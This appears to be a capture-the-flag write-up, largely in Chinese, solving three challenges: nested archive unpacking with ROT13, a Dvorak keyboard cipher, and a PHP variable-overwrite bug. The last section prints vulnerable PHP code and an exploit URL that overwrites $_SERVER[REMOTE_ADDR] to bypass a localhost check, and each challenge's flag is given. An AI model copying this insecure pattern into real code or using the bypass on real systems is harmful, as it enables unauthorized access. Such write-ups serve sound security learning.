Russian Dolls

1
2
3
4
5
6

Description
  You find a strange file called russian_dolls_v2 in Snoopy's computer. Can you find the hidden secret?
  MD5(russian_dolls_v2): fc3f675b06533004772135bee67d5ecd

Hint
  "file" command is your good friend.

其實這題就是把東西拿去給 7-zip 解壓縮，7-zip 解壓縮失敗再用 file 看檔案類型就好 (?)

解壓縮 russian_dolls_v2.zip 會得到 level1 這個檔案，再解壓縮會得到一個 base64 處理過的檔案，然後第三層是 gzip 檔，第四層是 bzip，第五層是 lzip，第六層是 tar，第七層是 xz，最後會得到一個文字檔

1

PGS{Cnpxrq!Cnpxrq!Cnpxrq}

前三個字應該是 CTF，所以就拿去 rot13 線上工具 就可以得到 flag 了

CTF{Packed!Packed!Packed}

zxcvb

1
2
3
4
5
6

Description
  John doesn't like zxcvb :((
  Yp4U1;IKY_XX,dokt"alh"HH.soav+

Hint
  crypto slides will help you 

他說他討厭 zxcvb ，這在鍵盤上剛好連成一排，所以應該說他討厭用 QWERTY 鍵盤，所以他應該是使用 Dvorak 鍵盤，有 online tool 可以用

Fl4G1sCTF{QQwerty_and_DDvorak}

Overthewire

1
2
3
4
5

Description
  http://overthewire.hackme.cc/

Hint
  這種漏洞的名字叫做變量覆蓋

連到網站可以看到 flag.php、overthewire.txt、overthewire.php 三個檔案，然後看到 overthewire.txt 裡面是段 php code

1
2
3
4
5
6
7
8
9
10
11
12
13

<?php
    include 'flag.php'; 

    // preparing 
    foreach ($_REQUEST as $key => $value) {
        $$key = $value;
    }

    if ( $_SERVER['REMOTE_ADDR'] == '127.0.0.1' ){
        echo $flag;
    } else {
        echo 'there is no space like 127.0.0.1';
    }

這段讓 $_SERVER['REMOTE_ADDR'] 可以覆蓋掉

http://overthewire.hackme.cc/overthewire.php?_SERVER[REMOTE_ADDR]=127.0.0.1

這樣就可以得到 flag 了

CTF{the_world_is_not_beautiful_therefore_it_is}